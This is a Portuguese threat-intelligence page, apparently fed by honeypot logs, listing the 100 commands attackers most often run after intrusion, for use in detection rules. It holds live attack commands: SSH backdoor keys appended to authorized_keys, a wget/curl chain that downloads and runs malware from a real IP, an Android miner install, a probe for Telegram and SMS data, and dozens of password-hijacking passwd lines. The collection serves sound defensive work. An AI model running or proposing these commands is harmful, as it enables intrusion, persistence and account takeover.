TROYANOSYVIRUS
Atualizado: abril de 2026

Top 100 Comandos Maliciosos

Os comandos mais executados por atacantes após obter acesso ao sistema. Útil para detecção de intrusões e resposta a incidentes.

5,261 comandos em 24h
1.
$uname -a
159 IPs265x
2.
$Enter new UNIX password:
91 IPs256x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
161 IPs244x
4.
$lockr -ia .ssh
161 IPs244x
5.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
158 IPs241x
6.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
155 IPs235x
7.
$whoami
155 IPs235x
8.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
155 IPs235x
9.
$lscpu | grep Model
155 IPs235x
10.
$cat /proc/cpuinfo | grep model | grep name | wc -l
153 IPs234x
11.
$cat /proc/cpuinfo | grep name | wc -l
154 IPs234x
12.
$which ls
154 IPs234x
13.
$uname -m
153 IPs234x
14.
$crontab -l
154 IPs234x
15.
$ls -lh $(which ls)
154 IPs234x
16.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
154 IPs234x
17.
$top
153 IPs234x
18.
$w
152 IPs233x
19.
$uname
153 IPs233x
20.
$/bin/./uname -s -v -n -r -m
20 IPs144x
21.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
94 IPs107x
22.
$cd /data/local/tmp;mkdir .p 2>/dev/null;cd .p;(wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null||curl -so b http://196.251.107.133/bins/parm7 2>/dev/null||toybox wget -qO b http://196.251.107.133/bins/parm7 2>/dev/null);chmod 777 b 2>/dev/null;(su 0 ./b adb||./b adb) 2>/dev/null;rm -f b;(wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||busybox wget -qO b http://196.251.107.133/bins/parm5 2>/dev/null||curl -so b ht
1 IPs9x
23.
$uname -s -v -n -r -m
4 IPs7x
24.
$/ip cloud print
3 IPs6x
25.
$ps | grep trinity
3 IPs6x
26.
$pm install /data/local/tmp/ufo.apk
3 IPs6x
27.
$am start -n com.ufo.miner/com.example.test.MainActivity
3 IPs6x
28.
$rm -rf /data/local/tmp/*
3 IPs6x
29.
$pm path com.ufo.miner
3 IPs6x
30.
$rm -f /data/local/tmp/ufo.apk
3 IPs6x
31.
$/data/local/tmp/nohup su -c /data/local/tmp/trinity
3 IPs5x
32.
$chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtB
1 IPs5x
33.
$/data/local/tmp/nohup /data/local/tmp/trinity
3 IPs5x
34.
$chmod 0755 /data/local/tmp/trinity
3 IPs5x
35.
$chmod 0755 /data/local/tmp/nohup
3 IPs5x
36.
$echo Hi | cat -n
3 IPs3x
37.
$cat /proc/cpuinfo
3 IPs3x
38.
$uname -s -v -n -m 2 > /dev/null
1 IPs3x
39.
$ps -ef | grep '[Mm]iner'
3 IPs3x
40.
$ps | grep '[Mm]iner'
3 IPs3x
41.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
3 IPs3x
42.
$ifconfig
3 IPs3x
43.
$echo hello
1 IPs3x
44.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $
1 IPs3x
45.
$locate D877F783D5D3EF8Cs
2 IPs2x
46.
$echo 'SSH check'
1 IPs2x
47.
$uname -s -m
2 IPs2x
48.
$echo "0\nhFohi2WWrkUk\nhFohi2WWrkUk\n"|passwd
1 IPs1x
49.
$echo "Asdf@123\nbQp3FHC3KhSC\nbQp3FHC3KhSC\n"|passwd
1 IPs1x
50.
$echo "0\nYy1vancBjhYK\nYy1vancBjhYK\n"|passwd
1 IPs1x
51.
$echo "Asdf@123\nW1iZNNqJgjfL\nW1iZNNqJgjfL\n"|passwd
1 IPs1x
52.
$echo "Ali01!\nT55qeqntqbJY\nT55qeqntqbJY\n"|passwd
1 IPs1x
53.
$echo "0\nK21eWWM1Th6T\nK21eWWM1Th6T\n"|passwd
1 IPs1x
54.
$echo "0\nJBVm93zvIJeT\nJBVm93zvIJeT\n"|passwd
1 IPs1x
55.
$echo "Aa123456\niKRVgALlFMLT\niKRVgALlFMLT\n"|passwd
1 IPs1x
56.
$echo "Asdf@123\nJJJNANQMVHgQ\nJJJNANQMVHgQ\n"|passwd
1 IPs1x
57.
$echo "Aa123456\nRFpLRQmnTwvM\nRFpLRQmnTwvM\n"|passwd
1 IPs1x
58.
$echo "Asdf@123\nZiyKGCufAMsC\nZiyKGCufAMsC\n"|passwd
1 IPs1x
59.
$echo "0\nBun0W1mtjcOb\nBun0W1mtjcOb\n"|passwd
1 IPs1x
60.
$echo "Asdf@123\nbqs5Doat30yi\nbqs5Doat30yi\n"|passwd
1 IPs1x
61.
$echo "Bot01\nmzJh8NsQSMVT\nmzJh8NsQSMVT\n"|passwd
1 IPs1x
62.
$echo "Bot25!\nanD0P5aD3kF2\nanD0P5aD3kF2\n"|passwd
1 IPs1x
63.
$echo "Aa123321\nL9Xx6QEIAjXA\nL9Xx6QEIAjXA\n"|passwd
1 IPs1x
64.
$echo "AAAA123456\nqLucVkkvzI0Z\nqLucVkkvzI0Z\n"|passwd
1 IPs1x
65.
$echo "0\n9RAL3pk3hfTL\n9RAL3pk3hfTL\n"|passwd
1 IPs1x
66.
$echo "2026\nXAjlTzZtLVTK\nXAjlTzZtLVTK\n"|passwd
1 IPs1x
67.
$echo "n8n28\ncLzz099SiaI9\ncLzz099SiaI9\n"|passwd
1 IPs1x
68.
$echo "1qaz@WSX\nuTHp4TtyfIhf\nuTHp4TtyfIhf\n"|passwd
1 IPs1x
69.
$echo "lab\nXhMFFYq4kc8P\nXhMFFYq4kc8P\n"|passwd
1 IPs1x
70.
$echo "kris\n7CoB1kodZgH4\n7CoB1kodZgH4\n"|passwd
1 IPs1x
71.
$echo "1qaz@WSX\nsTseuTiUiSS1\nsTseuTiUiSS1\n"|passwd
1 IPs1x
72.
$echo "1q2w3e4r\ns70dxzYtXBK5\ns70dxzYtXBK5\n"|passwd
1 IPs1x
73.
$echo "0\n4d6worH6mNGc\n4d6worH6mNGc\n"|passwd
1 IPs1x
74.
$echo "0\n3TN4ZkLRndQ6\n3TN4ZkLRndQ6\n"|passwd
1 IPs1x
75.
$echo "1q2w3e4r\no79A2gY9ONxB\no79A2gY9ONxB\n"|passwd
1 IPs1x
76.
$echo "1q2w3e4r\njuiYOZDgCqNV\njuiYOZDgCqNV\n"|passwd
1 IPs1x
77.
$echo "0\n1lkOKVQ24z7v\n1lkOKVQ24z7v\n"|passwd
1 IPs1x
78.
$echo "1q2w3e4r\nS9ay6QAXm32i\nS9ay6QAXm32i\n"|passwd
1 IPs1x
79.
$echo "frappe20!\nTefnIwZ8t5Mq\nTefnIwZ8t5Mq\n"|passwd
1 IPs1x
80.
$echo "123qweasd\nHj2w8kBEg8NA\nHj2w8kBEg8NA\n"|passwd
1 IPs1x
81.
$echo "!@#qweasd\nnIDy3V6DhFG1\nnIDy3V6DhFG1\n"|passwd
1 IPs1x
82.
$echo "frappe123\nsOywA4Yu0zN7\nsOywA4Yu0zN7\n"|passwd
1 IPs1x
83.
$echo "dev27\nya2Zq7UAM3bl\nya2Zq7UAM3bl\n"|passwd
1 IPs1x
84.
$echo "123456\nx4VnOHRe1uxJ\nx4VnOHRe1uxJ\n"|passwd
1 IPs1x
85.
$echo "dev27\nZN7ZNtimNlva\nZN7ZNtimNlva\n"|passwd
1 IPs1x
86.
$echo "dev27\nQrbyBZdFloex\nQrbyBZdFloex\n"|passwd
1 IPs1x
87.
$echo "123456\nuxt7GCV2zZQ5\nuxt7GCV2zZQ5\n"|passwd
1 IPs1x
88.
$echo "frappe20!\nUwbneUKUHoAP\nUwbneUKUHoAP\n"|passwd
1 IPs1x
89.
$echo "frappe20!\nZhBCO5sgt44W\nZhBCO5sgt44W\n"|passwd
1 IPs1x
90.
$echo "ftpuser8\nBvwmrePJDWXe\nBvwmrePJDWXe\n"|passwd
1 IPs1x
91.
$echo "ftpuser8\nN1JsLt7bDE8y\nN1JsLt7bDE8y\n"|passwd
1 IPs1x
92.
$echo "home\nB4Yez4BIKu0y\nB4Yez4BIKu0y\n"|passwd
1 IPs1x
93.
$echo "home\nW5cKkHlEc0eN\nW5cKkHlEc0eN\n"|passwd
1 IPs1x
94.
$echo "home\ntwgYkpYhSjAl\ntwgYkpYhSjAl\n"|passwd
1 IPs1x
95.
$echo "admin2\nrLaxLIKhjWsi\nrLaxLIKhjWsi\n"|passwd
1 IPs1x
96.
$echo "kris\ndUbxAdscGvLH\ndUbxAdscGvLH\n"|passwd
1 IPs1x
97.
$echo "admin2\nZIl2aKTVq4Nw\nZIl2aKTVq4Nw\n"|passwd
1 IPs1x
98.
$echo "lab\nb8cDRWRDGcXE\nb8cDRWRDGcXE\n"|passwd
1 IPs1x
99.
$echo "admin2\nFJKGrQpUs0VS\nFJKGrQpUs0VS\n"|passwd
1 IPs1x
100.
$echo "Vpn15\niu9l27oFsR5K\niu9l27oFsR5K\n"|passwd
1 IPs1x

Reconhecimento

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistência

crontab, chmod, chattr

Mov. Lateral

ssh, scp, ping

Uso para Detecção

Estes comandos podem ser usados para criar regras de detecção em SIEM, IDS/IPS e sistemas de monitoramento. Monitore estes padrões em seus logs para detectar intrusões.